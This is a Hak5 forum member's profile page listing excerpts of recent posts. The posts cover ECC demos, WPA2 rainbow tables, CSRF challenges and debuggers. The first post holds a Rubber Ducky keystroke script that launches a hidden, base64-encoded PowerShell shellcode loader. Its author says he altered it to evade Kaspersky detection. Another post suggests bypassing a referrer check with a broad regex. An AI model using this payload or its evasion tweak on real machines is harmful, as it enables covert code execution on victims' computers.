Jump to content


Active Members
  • Content Count

  • Joined

  • Last visited

  • Days Won


About fugu

  • Rank
    Hak5 Zombie

Recent Profile Visitors

2,451 profile views
  1. this is untested, but I rewrote the hashing that your exploit is using. instead of the ror13 hash that was being used, I changed it to ror12. on virustotal now, kaspersky is unable to detect it, but it could be cause I created a bug that I don't know about in the process, like I said, i haven't tested it. DELAY 5000 GUI r DELAY 1000 STRING cmd ENTER DELAY 1000 STRING powershell -nop -win hidden -noni -enc JE9VazAgPSAnJHpRRUMgPSAnJ1tEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBWaXJ0dWFsQWxsb2MoSW50UHRyIGxwQWRkcmVzcywgdWludCBkd1NpemUsIHVpbnQgZmxBbGxvY2F0aW9uVHlwZSw
  2. I know a really ugly way to do this, it kinda works but is going to throw some errors in the process. you create a .bat file like auto.bat: #/bin/sh goto label0 ./MacOSX_program exit 0 label0: .\Windows_program.exe The windows OS will see that the filename has a .bat extension. I doesn't know what #/bin/sh means so it throws an error, but continues on. It follows the goto the label0 and then runs the Windows_program.exe. The mac OS will ignore the .bat extension, but read #/bin/sh as a shell script. it will error on the goto, but continue on to run the MacOSX_program
  3. A while back I was looking into creating a program that would create a rainbowtables-like set of tables, that would handle WPA2/HMAC/SHA1 and I probably could have started making one, but the major problem with it is the keyspace size is way too large. This is referred to as Time Memory Trade Off, so the less time you want it to take, the more memory your tables are going to take up on the hard drive. For WPA2 the keyspace is going to be based on the PASSPHRASE that was used, plus SSID, plus a random number called the ANONCE, plus a random number called the SNONCE. even if you knew what the p
  4. In many of the documents that I've been looking over, they talk about many of these things in terms of the mathematics, and I tend to see the same single letter variables being used over and over again. Some references will use different letters so its not always constant, but I was primarily going off of the site http://www.johannes-bauer.com/compsci/ecc/ for a majority of the concepts. The functions for point addition, point doubling, and scalar multiplication were pulled directly from "Implementation of Elliptic Curve Cryptography in C" by Kuldeep Bhardwaj and Sanjay Chaudhary, appendix A.
  5. So this is a little demo I've been working on that plays around with ECC Point Mathematics & encryption. Many of the demos I've found have been not functional from beginning to end, and although this is not going to be a secure version of ECC, it does demo some of the basic properties of it. I'm using pieces of existing code, along with my own to get it working. Individual ECC curve properties as well as the public key/private key pair can be created with openssl: CRYPTNAME=secp192k1 && openssl ecparam -name $CRYPTNAME -out $CRYPTNAME.pem && openssl ecparam -in $CR
  6. You can also try powershell.exe -command "Write-Host (New-Object System.Net.WebClient).DownloadString(\"http://diagnostic.opendns.com/myip\")"
  7. fugu

    anti-CSRF mesure

    https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet I think this is the solution to that challenge, if I'm not mistaken.
  8. fugu

    anti-CSRF mesure

    doesn't ereg and eregi use regular expressions? If you have control of what will end up in the referrer field, couldn't you try and make the referrer a very widely encompassing regex like .* or something? I'm not sure the * is valid in the hostname location but maybe you can figure something out.
  9. The only way to know for sure what your external ip is (for the network your connected up to), is to send out a request and have the destination server tell you what your ip is. This has a lot of legitimate uses; NoScript's ABE uses this to help protect your browser. You might consider looking at dynamic dns as a solution to what your trying to do. There is software that is used on desktop machines to keep the external ip address of your home network associated with a dns entry, so that if you ever want to log into your home network when your away, you can just use your own dns to do so.
  10. fugu

    anti-CSRF mesure

    i don't know if you have the ability to modify the code, but if you can add echo "<pre><code>"; var_dump($_SERVER); echo "</code></pre>"; will let you examine all the various header entries that are stored in the $_SERVER variable during your request.
  11. Implementation of Elliptic Curve Cryptography in 'C' http://www.researchtrend.net/ijet32/6%20KULDEEP%20BHARDWAJ.pdf Elliptic Curve Cryptography: Algorithms and Implementation Analysis over Coordinate Systems http://www.researchgate.net/profile/Iskandar_Setiadi/publication/268688957_Elliptic_Curve_Cryptography_Algorithms_and_Implementation_Analysis_over_Coordinate_Systems/links/5474337a0cf29afed60f6340.pdf
  12. fugu


    I've heard the samsung S7 works even while pouring champagne on it.
  13. No problem:) There is a slightly better version of this at the Exploit DB www.exploit-db.com under shellcodes, which doesn't spam the log file or bog down the CPU.
  14. I've been looking for a new debugger for a while now. My previous debugger of choice for Windows was OllyDbg, which is the very first debugger I started with, but it's so outdated, and when I hop OS's (non-windows) it is not compatible. In Linux I tend to just use gdb, but its more designed for the command line, and it's nice to be able to look at the disassembled code, registers and stack all at the same time; imo it makes it easier to see whats going on. The debugger that looks most promising (to me) is IDA Pro, its available in multiple architectures, and i think it can even debug remotely
  15. is it possible that someone nearby is using airbase-ng to create fake ap's?
  • Create New...